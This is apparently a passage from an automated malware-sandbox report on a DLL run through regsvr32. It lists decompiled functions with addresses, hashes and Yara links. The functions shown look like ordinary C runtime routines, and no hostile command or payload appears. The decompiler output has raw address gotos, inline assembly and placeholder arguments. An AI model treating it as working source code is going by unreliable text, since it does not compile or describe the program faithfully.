                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 40%
                                                                                                    			E00000001180046740(char __ecx, void* __edx, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				long long _v48;
				char _v56;
				void* __rbx;
				void* _t31;
				char _t32;
				void* _t38;
				long long _t47;
				void* _t48;
				void* _t53;
				void* _t54;

				asm("movsd [esp+0x20], xmm3");
				asm("movsd [esp+0x18], xmm2");
				_push(_t48);
				_t32 = __ecx;
				r8d = 0;
				if ( *0x80053f20 == __edx) goto 0x8004677b;
				r8d = r8d + 1;
				if (0x180053f30 - 0x800540f0 < 0) goto 0x80046760;
				goto 0x80046786;
				_t47 =  *((intOrPtr*)(0x80053f20 + 8 + (r8d + r8d) * 8));
				_v48 = _t47;
				if (_t47 == 0) goto 0x800467f9;
				_v40 = _a24;
				_v36 = _a28;
				_v32 = _a32;
				_v28 = _a36;
				_v24 = _a40;
				_v20 = _a44;
				_v56 = __ecx;
				E00000001180046834(__ecx, _t38, _t48, _a48, _t53, _t54);
				_t52 =  &_v56;
				if (E000000011800322D8(_t32, _t48,  &_v56) != 0) goto 0x800467f1;
				E00000001180046710(_t32, _t47,  &_v56);
				asm("movsd xmm0, [esp+0x40]");
				goto 0x8004680e;
				E00000001180046834(_t32, _t38, _t48,  &_v56, _t53, _t54);
				_t31 = E00000001180046710(_t32, _t47, _t52);
				asm("movsd xmm0, [esp+0x80]");
				return _t31;
			}



















                                                                                                    0x180046740
                                                                                                    0x180046746
                                                                                                    0x18004674c
                                                                                                    0x180046758
                                                                                                    0x18004675d
                                                                                                    0x180046762
                                                                                                    0x180046764
                                                                                                    0x180046775
                                                                                                    0x180046779
                                                                                                    0x180046781
                                                                                                    0x180046793
                                                                                                    0x18004679b
                                                                                                    0x1800467a1
                                                                                                    0x1800467a9
                                                                                                    0x1800467b1
                                                                                                    0x1800467b9
                                                                                                    0x1800467c4
                                                                                                    0x1800467cf
                                                                                                    0x1800467d3
                                                                                                    0x1800467d7
                                                                                                    0x1800467dc
                                                                                                    0x1800467e8
                                                                                                    0x1800467ec
                                                                                                    0x1800467f1
                                                                                                    0x1800467f7
                                                                                                    0x1800467f9
                                                                                                    0x180046800
                                                                                                    0x180046805
                                                                                                    0x180046813

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _ctrlfp_set_errno_from_matherr
                                                                                                    • String ID: exp
                                                                                                    • API String ID: 4230380726-113136155
                                                                                                    • Opcode ID: 96a4c8b0948508244ed17a82cdb5fada79c85bbbe85e4a5a354b2b99b9f39a44
                                                                                                    • Instruction ID: 6cde49a90cb44ba2a336159fe30cd4a51f8757ca9fc837c1f29a2d1cf1665782
                                                                                                    • Opcode Fuzzy Hash: 96a4c8b0948508244ed17a82cdb5fada79c85bbbe85e4a5a354b2b99b9f39a44
                                                                                                    • Instruction Fuzzy Hash: 03215336A19A48CBD7A1CF28E48079A73A0F78C788F108625FA8D83B55EF38C544CF04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018000F83C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: a04f9c61fffcf3d3b8ff22d059fbbf551251e16c1267730e45cb49bb2bf67e50
                                                                                                    • Instruction ID: 6987317728ba1f4f7013566c3f9d20cafef4de4a1fa0f9a2d40b760d4198e1f9
                                                                                                    • Opcode Fuzzy Hash: a04f9c61fffcf3d3b8ff22d059fbbf551251e16c1267730e45cb49bb2bf67e50
                                                                                                    • Instruction Fuzzy Hash: A7F04F32619A4881FF968B55E4943F92360EB8C7C4F499029F94B46764DE7CC68CD708
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00000001800416EC Relevance: 7.8, APIs: 5, Instructions: 265COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fe316d643b363e4ad5ee15e4d76d9c07086c4b9f28c0f741a4773019d782dada
                                                                                                    • Instruction ID: 84e58aeb51c5745112eaa8468fa27da61fd6824af893536e16dddff20c448d14
                                                                                                    • Opcode Fuzzy Hash: fe316d643b363e4ad5ee15e4d76d9c07086c4b9f28c0f741a4773019d782dada
                                                                                                    • Instruction Fuzzy Hash: 62A1F872705B884AFFA38B6094803E966E1B7487EDF46C625FA59077C5DF78C65C8308
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00000001800427A8 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 38%
                                                                                                    			E000000011800427A8(signed long long __ecx, void* __edx, void* __esi, intOrPtr* __rax, long long __rbx, signed short* __rdx, long long _a32) {
				char _v64;
				signed long long _v72;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v96;
				long long _v100;
				signed int _v104;
				signed int _v120;
				void* __rsi;
				void* __rbp;
				void* _t75;
				long _t93;
				unsigned int _t94;
				intOrPtr _t102;
				signed int _t123;
				intOrPtr _t156;
				unsigned long long _t162;
				signed int* _t164;
				intOrPtr _t167;
				signed short* _t177;
				unsigned int _t180;
				signed short* _t181;
				void* _t183;
				signed long long _t191;
				void* _t192;
				signed long long _t194;
				signed long long _t195;
				signed long long _t197;
				void* _t198;
				signed short* _t199;

				_t177 = __rdx;
				_t165 = __rbx;
				_a32 = __rbx;
				r15d = r8d;
				_t191 = __ecx;
				_t181 = __rdx;
				if (r8d != 0) goto 0x800427d6;
				goto 0x80042a71;
				if (__rdx != 0) goto 0x800427fa;
				E0000000118002E67C(__rax);
				 *__rax = 0;
				_t75 = E0000000118002E69C(__rax);
				 *__rax = 0x16;
				E0000000118002E4F0(_t75);
				goto 0x80042a71;
				r14d = r14d & 0x0000003f;
				_t194 = _t191 >> 6;
				_t197 = _t191 << 6;
				_v72 = _t194;
				_t167 =  *((intOrPtr*)(0x8005ea90 + _t194 * 8));
				_t102 =  *((intOrPtr*)(_t167 + _t197 + 0x39));
				if (__rbx - 1 - 1 > 0) goto 0x80042830;
				if (( !r15d & 0x00000001) == 0) goto 0x800427db;
				if (( *(_t167 + _t197 + 0x38) & 0x00000020) == 0) goto 0x80042846;
				_t14 = _t177 + 2; // 0x2
				r8d = _t14;
				0x8004391c();
				_v88 = _t180;
				if (E00000001180039ECC(r12d, 0, 0x8005ea90) == 0) goto 0x8004295b;
				_t156 =  *((intOrPtr*)(0x8005ea90 + _t194 * 8));
				if (( *(0x8005ea90 + _t197 + 0x38) & 0x00000080) == 0) goto 0x8004295b;
				E0000000118002C43C(_t156, __rbx);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x90)) + 0x138)) != _t180) goto 0x8004289c;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x8005ea90 + _t194 * 8)) + _t197 + 0x39)) == dil) goto 0x8004295b;
				if (GetConsoleMode(??, ??) == 0) goto 0x8004295b;
				if (_t102 == 0) goto 0x8004293d;
				if (_t102 - 1 - 1 > 0) goto 0x800429f8;
				_v104 = _v104 & 0;
				_t192 = _t181 + _t198;
				_t199 = _t181;
				_v100 = 0;
				if (_t181 - _t192 >= 0) goto 0x800429ee;
				r13d =  *_t199 & 0x0000ffff;
				if (E00000001180044C04(r13w & 0xffffffff) != r13w) goto 0x8004292b;
				_v100 = 2;
				if (r13w != 0xa) goto 0x80042920;
				r13d = 0xd;
				if (E00000001180044C04(r13d) != r13w) goto 0x8004292b;
				_v100 = 2;
				if ( &(_t199[1]) - _t192 >= 0) goto 0x80042934;
				goto 0x800428e5;
				_v104 = GetLastError();
				_t195 = _v72;
				goto 0x800429ee;
				r9d = r15d;
				E00000001180041FF8(r12d, 1, __esi, _t165,  &_v104,  &_v64, _t181);
				asm("movsd xmm0, [eax]");
				_t123 =  *0x18005EA98;
				goto 0x800429f3;
				if (( *( *((intOrPtr*)(0x8005ea90 + _t195 * 8)) + _t197 + 0x38) & 0x00000080) == 0) goto 0x800429bb;
				if (3 == 0) goto 0x800429a7;
				if (3 == 0) goto 0x80042993;
				if (2 != 1) goto 0x800429f8;
				r9d = r15d;
				E0000000118004242C(3, r12d, 0x8005ea90, _t165,  &_v104, _t183, _t181);
				goto 0x8004294f;
				r9d = r15d;
				E00000001180042548(r12d, _t123, 0x8005ea90, _t165,  &_v104, _t183, _t181);
				goto 0x8004294f;
				r9d = r15d;
				E00000001180042324(r12d, _t123, 0x8005ea90, _t165,  &_v104, _t183, _t181);
				goto 0x8004294f;
				_v104 = _v104 & _t123;
				_v120 = _v120 & 0x8005ea90;
				r8d = r15d;
				_v100 = 0x8005ea90;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x800429eb;
				_t93 = GetLastError();
				_v104 = _t93;
				asm("movsd xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x20], xmm0");
				_t162 = _v88 >> 0x20;
				if (_t93 != 0) goto 0x80042a6c;
				_t94 = _v88;
				if (_t94 == 0) goto 0x80042a38;
				if (_t94 != 5) goto 0x80042a2b;
				E0000000118002E69C(_t162);
				 *_t162 = 9;
				E0000000118002E67C(_t162);
				 *_t162 = 5;
				goto 0x800427f2;
				E0000000118002E62C(_v88, r12d, _t162, _t165, _t181, _t181);
				goto 0x800427f2;
				_t164 =  *((intOrPtr*)(0x8005ea90 + _t195 * 8));
				if (( *(0x8005ea90 + _t197 + 0x38) & 0x00000040) == 0) goto 0x80042a54;
				if ( *_t181 == 0x1a) goto 0x800427cf;
				E0000000118002E69C(_t164);
				 *0x8005ea90 = 0x1c;
				E0000000118002E67C(_t164);
				 *_t164 =  *_t164 & 0x00000000;
				goto 0x800427f2;
				return _v84 - _v96;
			}

































                                                                                                    0x1800427a8
                                                                                                    0x1800427a8
                                                                                                    0x1800427a8
                                                                                                    0x1800427c1
                                                                                                    0x1800427c4
                                                                                                    0x1800427c7
                                                                                                    0x1800427cd
                                                                                                    0x1800427d1
                                                                                                    0x1800427d9
                                                                                                    0x1800427db
                                                                                                    0x1800427e0
                                                                                                    0x1800427e2
                                                                                                    0x1800427e7
                                                                                                    0x1800427ed
                                                                                                    0x1800427f5
                                                                                                    0x180042804
                                                                                                    0x18004280b
                                                                                                    0x18004280f
                                                                                                    0x180042813
                                                                                                    0x180042817
                                                                                                    0x18004281b
                                                                                                    0x180042825
                                                                                                    0x18004282e
                                                                                                    0x180042836
                                                                                                    0x18004283d
                                                                                                    0x18004283d
                                                                                                    0x180042841
                                                                                                    0x180042849
                                                                                                    0x180042854
                                                                                                    0x180042861
                                                                                                    0x18004286b
                                                                                                    0x180042871
                                                                                                    0x180042884
                                                                                                    0x180042896
                                                                                                    0x1800428b8
                                                                                                    0x1800428c0
                                                                                                    0x1800428c7
                                                                                                    0x1800428cd
                                                                                                    0x1800428d0
                                                                                                    0x1800428d6
                                                                                                    0x1800428d9
                                                                                                    0x1800428df
                                                                                                    0x1800428e5
                                                                                                    0x1800428f6
                                                                                                    0x1800428fb
                                                                                                    0x180042903
                                                                                                    0x180042905
                                                                                                    0x180042917
                                                                                                    0x18004291b
                                                                                                    0x180042927
                                                                                                    0x180042929
                                                                                                    0x180042931
                                                                                                    0x180042934
                                                                                                    0x180042938
                                                                                                    0x18004293d
                                                                                                    0x18004294a
                                                                                                    0x18004294f
                                                                                                    0x180042953
                                                                                                    0x180042956
                                                                                                    0x18004296c
                                                                                                    0x180042973
                                                                                                    0x180042978
                                                                                                    0x18004297d
                                                                                                    0x18004297f
                                                                                                    0x18004298c
                                                                                                    0x180042991
                                                                                                    0x180042993
                                                                                                    0x1800429a0
                                                                                                    0x1800429a5
                                                                                                    0x1800429a7
                                                                                                    0x1800429b4
                                                                                                    0x1800429b9
                                                                                                    0x1800429c4
                                                                                                    0x1800429c9
                                                                                                    0x1800429ce
                                                                                                    0x1800429d4
                                                                                                    0x1800429e0
                                                                                                    0x1800429e2
                                                                                                    0x1800429e8
                                                                                                    0x1800429ee
                                                                                                    0x1800429f3
                                                                                                    0x1800429fc
                                                                                                    0x180042a02
                                                                                                    0x180042a04
                                                                                                    0x180042a09
                                                                                                    0x180042a0e
                                                                                                    0x180042a10
                                                                                                    0x180042a15
                                                                                                    0x180042a1b
                                                                                                    0x180042a20
                                                                                                    0x180042a26
                                                                                                    0x180042a2e
                                                                                                    0x180042a33
                                                                                                    0x180042a3f
                                                                                                    0x180042a49
                                                                                                    0x180042a4e
                                                                                                    0x180042a54
                                                                                                    0x180042a59
                                                                                                    0x180042a5f
                                                                                                    0x180042a64
                                                                                                    0x180042a67
                                                                                                    0x180042a88

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: a2e1a73169c103621f79c15b0066cf838891e8bd3c69527ff6c8581d89243a2b
                                                                                                    • Instruction ID: 2db074ff2d816a0da1ba5a5a64b57e17ae301fb28c4393343d6a6a03847c01c7
                                                                                                    • Opcode Fuzzy Hash: a2e1a73169c103621f79c15b0066cf838891e8bd3c69527ff6c8581d89243a2b
                                                                                                    • Instruction Fuzzy Hash: 0F81BB32710A5999F7A39B2598C07ED2BA0B34DBDCF82C105FE4A53795CF348A4AC318
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180046144 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 23%
                                                                                                    			E00000001180046144(signed int __ecx, long long __rbx, signed int __rcx, void* __rdx, signed int __r8, char _a8, long long _a16, unsigned int _a32, unsigned int _a36, signed short _a38) {
				signed short _t34;
				unsigned int _t37;
				unsigned int _t38;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t47;
				void* _t55;
				unsigned int _t56;
				void* _t63;
				signed int _t69;
				signed int _t70;
				void* _t73;
				signed int _t74;
				void* _t75;
				signed int _t79;
				signed int _t82;
				signed long long _t86;
				void* _t102;
				void* _t103;

				_a16 = __rbx;
				r14d = 0;
				asm("movaps [esp+0x20], xmm6");
				_t43 = __ecx & 0x0000001f;
				r12d = __ecx;
				_t2 = _t103 + 0x10; // 0x10
				r13d = _t2;
				if ((__ecx & 0x00000008) == 0) goto 0x8004618d;
				if (r15b >= 0) goto 0x8004618d;
				E000000011800468B0(_t43, __rcx);
				_t44 = _t43 & 0xfffffff7;
				goto 0x8004636d;
				_t69 = 0x00000004 & r12b;
				if (_t69 == 0) goto 0x800461ab;
				asm("dec ecx");
				if (_t69 >= 0) goto 0x800461ab;
				E000000011800468B0(_t44, __rcx);
				_t45 = _t44 & 0xfffffffb;
				goto 0x8004636d;
				_t70 = dil & r12b;
				if (_t70 == 0) goto 0x80046269;
				asm("dec ecx");
				if (_t70 >= 0) goto 0x80046269;
				E000000011800468B0(_t45, __rcx);
				_t86 = __r8 & __rcx;
				if (_t70 == 0) goto 0x80046236;
				if (_t86 == 0x2000) goto 0x8004621e;
				if (_t86 == 0x4000) goto 0x80046206;
				_t73 = _t86 - __rcx;
				if (_t73 != 0) goto 0x80046261;
				asm("movsd xmm0, [esi]");
				asm("comisd xmm0, [0xdfb6]");
				asm("movsd xmm0, [0xdfde]");
				if (_t73 > 0) goto 0x8004625d;
				goto 0x80046256;
				asm("movsd xmm0, [esi]");
				asm("comisd xmm0, [0xdf9e]");
				if (_t73 > 0) goto 0x80046244;
				asm("movsd xmm0, [0xdfc4]");
				goto 0x80046256;
				asm("movsd xmm0, [esi]");
				asm("comisd xmm0, [0xdf86]");
				if (_t73 <= 0) goto 0x8004624e;
				asm("movsd xmm0, [0xdfac]");
				goto 0x8004625d;
				asm("movsd xmm0, [esi]");
				asm("comisd xmm0, [0xdf6e]");
				if (_t73 <= 0) goto 0x8004624e;
				asm("movsd xmm0, [0xdf84]");
				goto 0x8004625d;
				asm("movsd xmm0, [0xdf7a]");
				asm("xorps xmm0, [0xdf63]");
				asm("movsd [esi], xmm0");
				_t46 = _t45 & 0xfffffffe;
				goto 0x8004636d;
				_t74 = r12b & 0x00000002;
				if (_t74 == 0) goto 0x8004636d;
				asm("dec ecx");
				if (_t74 >= 0) goto 0x8004636d;
				asm("movsd xmm0, [edx]");
				asm("xorps xmm6, xmm6");
				_t63 =  !=  ? 1 : r14d;
				asm("ucomisd xmm0, xmm6");
				if (_t74 != 0) goto 0x800462a0;
				if (_t74 != 0) goto 0x800462a0;
				goto 0x8004635e;
				_t34 = E000000011800469BC(r12b & r13b, _t74,  &_a8);
				_t55 = _a8 + 0xfffffa00;
				asm("movsd [esp+0x88], xmm0");
				_t75 = _t55 - 0xfffffbce;
				if (_t75 >= 0) goto 0x800462d0;
				asm("mulsd xmm0, xmm6");
				goto 0x8004635a;
				r8d = r14d;
				asm("comisd xmm6, xmm0");
				r8b = _t75 > 0;
				_a38 = _t34 & 0x0000000f | r13w;
				if (_t55 - 0xfffffc03 >= 0) goto 0x80046345;
				_t37 = _a32;
				_t56 = _a36;
				if ((dil & _t37) == 0) goto 0x8004631e;
				_t66 =  ==  ? 1 : 1;
				_t38 = _t37 >> 1;
				_a32 = _t38;
				_t79 = dil & _t56;
				if (_t79 == 0) goto 0x80046337;
				asm("bts eax, 0x1f");
				_a32 = _t38;
				if (_t79 != 0) goto 0x80046314;
				_a36 = _t56 >> 1;
				asm("movsd xmm0, [esp+0x88]");
				if (r8d == 0) goto 0x8004635a;
				asm("xorps xmm0, [0xde66]");
				asm("movsd [esi], xmm0");
				_t81 =  ==  ? 1 : 1;
				if (( ==  ? 1 : 1) == 0) goto 0x8004636a;
				E000000011800468B0(_t46, _t102);
				_t47 = _t46 & 0xfffffffd;
				_t82 = r13b & r12b;
				if (_t82 == 0) goto 0x80046386;
				asm("dec ecx");
				if (_t82 >= 0) goto 0x80046386;
				E000000011800468B0(_t47, _t102);
				asm("movaps xmm6, [esp+0x20]");
				r14b = (_t47 & 0xffffffef) == 0;
				return r14d;
			}
























                                                                                                    0x180046144
                                                                                                    0x180046158
                                                                                                    0x18004615b
                                                                                                    0x180046165
                                                                                                    0x18004616b
                                                                                                    0x18004616e
                                                                                                    0x18004616e
                                                                                                    0x180046175
                                                                                                    0x18004617a
                                                                                                    0x180046180
                                                                                                    0x180046185
                                                                                                    0x180046188
                                                                                                    0x180046192
                                                                                                    0x180046195
                                                                                                    0x180046197
                                                                                                    0x18004619c
                                                                                                    0x18004619e
                                                                                                    0x1800461a3
                                                                                                    0x1800461a6
                                                                                                    0x1800461b0
                                                                                                    0x1800461b3
                                                                                                    0x1800461b9
                                                                                                    0x1800461be
                                                                                                    0x1800461c7
                                                                                                    0x1800461d4
                                                                                                    0x1800461d7
                                                                                                    0x1800461df
                                                                                                    0x1800461e7
                                                                                                    0x1800461e9
                                                                                                    0x1800461ec
                                                                                                    0x1800461ee
                                                                                                    0x1800461f2
                                                                                                    0x1800461fa
                                                                                                    0x180046202
                                                                                                    0x180046204
                                                                                                    0x180046206
                                                                                                    0x18004620a
                                                                                                    0x180046212
                                                                                                    0x180046214
                                                                                                    0x18004621c
                                                                                                    0x18004621e
                                                                                                    0x180046222
                                                                                                    0x18004622a
                                                                                                    0x18004622c
                                                                                                    0x180046234
                                                                                                    0x180046236
                                                                                                    0x18004623a
                                                                                                    0x180046242
                                                                                                    0x180046244
                                                                                                    0x18004624c
                                                                                                    0x18004624e
                                                                                                    0x180046256
                                                                                                    0x18004625d
                                                                                                    0x180046261
                                                                                                    0x180046264
                                                                                                    0x180046269
                                                                                                    0x18004626d
                                                                                                    0x180046273
                                                                                                    0x180046278
                                                                                                    0x18004627e
                                                                                                    0x18004628b
                                                                                                    0x18004628e
                                                                                                    0x180046291
                                                                                                    0x180046295
                                                                                                    0x180046297
                                                                                                    0x18004629b
                                                                                                    0x1800462a5
                                                                                                    0x1800462ae
                                                                                                    0x1800462b4
                                                                                                    0x1800462bd
                                                                                                    0x1800462c3
                                                                                                    0x1800462c5
                                                                                                    0x1800462cb
                                                                                                    0x1800462d8
                                                                                                    0x1800462db
                                                                                                    0x1800462df
                                                                                                    0x1800462ef
                                                                                                    0x1800462fd
                                                                                                    0x1800462ff
                                                                                                    0x18004630d
                                                                                                    0x180046317
                                                                                                    0x18004631b
                                                                                                    0x18004631e
                                                                                                    0x180046320
                                                                                                    0x180046327
                                                                                                    0x18004632a
                                                                                                    0x18004632c
                                                                                                    0x180046330
                                                                                                    0x18004633c
                                                                                                    0x18004633e
                                                                                                    0x180046345
                                                                                                    0x180046351
                                                                                                    0x180046353
                                                                                                    0x18004635a
                                                                                                    0x18004635e
                                                                                                    0x180046360
                                                                                                    0x180046365
                                                                                                    0x18004636a
                                                                                                    0x18004636d
                                                                                                    0x180046370
                                                                                                    0x180046372
                                                                                                    0x180046377
                                                                                                    0x18004637e
                                                                                                    0x180046386
                                                                                                    0x180046392
                                                                                                    0x1800463a8

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _set_statfp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156100317-0
                                                                                                    • Opcode ID: bb39aff5827bd4cbb805d605c8fd09a664251e40dd2669249f8f5ff5b98d96a4
                                                                                                    • Instruction ID: 17288e754a937cf989becad1ea1cdb90f330aa175ad00eddb4db891861b37b46
                                                                                                    • Opcode Fuzzy Hash: bb39aff5827bd4cbb805d605c8fd09a664251e40dd2669249f8f5ff5b98d96a4
                                                                                                    • Instruction Fuzzy Hash: E851D632904E8C95F6E39F34E5903EA6260BB597DCF06C205BE96261F1FF7487898709
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180041FF8 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 43%
                                                                                                    			E00000001180041FF8(signed int __edx, void* __edi, void* __esi, long long __rbx, signed long long __rcx, void* __rdx, signed char* __r8, long long _a8) {
				signed int _v72;
				char _v80;
				signed char _v87;
				char _v88;
				long long _v96;
				long long _v104;
				int _v108;
				intOrPtr _v112;
				short _v116;
				char _v120;
				signed long long _v128;
				signed long long _v136;
				intOrPtr _v144;
				signed int _v152;
				int _t80;
				signed char _t87;
				signed long long _t117;
				intOrPtr* _t126;
				signed long long _t128;
				intOrPtr _t137;
				signed long long _t141;
				signed char* _t143;
				signed long long _t147;
				void* _t149;
				void* _t156;
				void* _t157;
				signed long long _t161;

				_t152 = __r8;
				_t128 = __rcx;
				_a8 = __rbx;
				_t117 =  *0x8005d010; // 0xb03f6156e10
				_v72 = _t117 ^ _t149 - 0x00000080;
				r12d = r9d;
				_t161 = __edx >> 6;
				_t147 = __edx << 6;
				_v96 = __r8;
				_t126 = __rcx;
				_t157 = _t156 + __r8;
				_v104 = 0x8005ea90;
				_v108 = GetConsoleCP();
				 *__rcx = __rdx;
				_t143 = __r8;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if (__r8 - _t157 >= 0) goto 0x800421d6;
				r13b =  *__r8;
				_v120 = 0;
				_t137 =  *((intOrPtr*)(0x8005ea90 + _t161 * 8));
				_t87 =  *(_t137 + _t147 + 0x3d);
				if ((_t87 & 0x00000004) == 0) goto 0x800420ab;
				 *(_t137 + _t147 + 0x3d) = _t87 & 0x000000fb;
				r8d = 2;
				_v88 =  *((intOrPtr*)(_t137 + _t147 + 0x3e));
				_v87 = r13b;
				goto 0x800420f0;
				E00000001180037C4C(_t87 & 0x000000fb, 0,  *((intOrPtr*)( *((intOrPtr*)(0x8005ea90 + _t161 * 8)) + _t147 + 0x28)), __rcx, __rcx,  &_v88);
				_t89 =  *__r8 & 0x000000ff;
				if (( *(0x8005ea90 + _t128 * 2) & 0x00008000) == 0) goto 0x800420e7;
				if (__r8 - _t157 >= 0) goto 0x800421b6;
				r8d = 2;
				if (E000000011800340D4( *__r8 & 0x000000ff, 0x8000, __r8 - _t157,  *((intOrPtr*)( *((intOrPtr*)(0x8005ea90 + _t161 * 8)) + _t147 + 0x28)), _t126,  &_v120, __r8) == 0xffffffff) goto 0x800421d6;
				goto 0x80042102;
				r8d = 1;
				if (E000000011800340D4(_t89, 0x8000, E000000011800340D4( *__r8 & 0x000000ff, 0x8000, __r8 - _t157,  *((intOrPtr*)( *((intOrPtr*)(0x8005ea90 + _t161 * 8)) + _t147 + 0x28)), _t126,  &_v120, __r8) - 0xffffffff,  *((intOrPtr*)( *((intOrPtr*)(0x8005ea90 + _t161 * 8)) + _t147 + 0x28)), _t126,  &_v120, _t152) == 0xffffffff) goto 0x800421d6;
				_v128 = _v128 & 0x00000000;
				_v136 = _v136 & 0x00000000;
				r9d = 1;
				_v144 = 5;
				_v152 =  &_v80;
				_t80 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
				r14d = _t80;
				if (_t80 == 0) goto 0x800421d6;
				_v152 = _v152 & 0x00000000;
				_t141 =  &_v80;
				r8d = _t80;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x800421ce;
				 *((intOrPtr*)(_t126 + 4)) =  *((intOrPtr*)(_t126 + 8)) - _v96 + __edi;
				if (_v112 - r14d < 0) goto 0x800421d6;
				if (r13b != 0xa) goto 0x800421ae;
				_t50 = _t141 + 0xd; // 0xd
				_v152 = _t141;
				_t52 = _t141 + 1; // 0x1
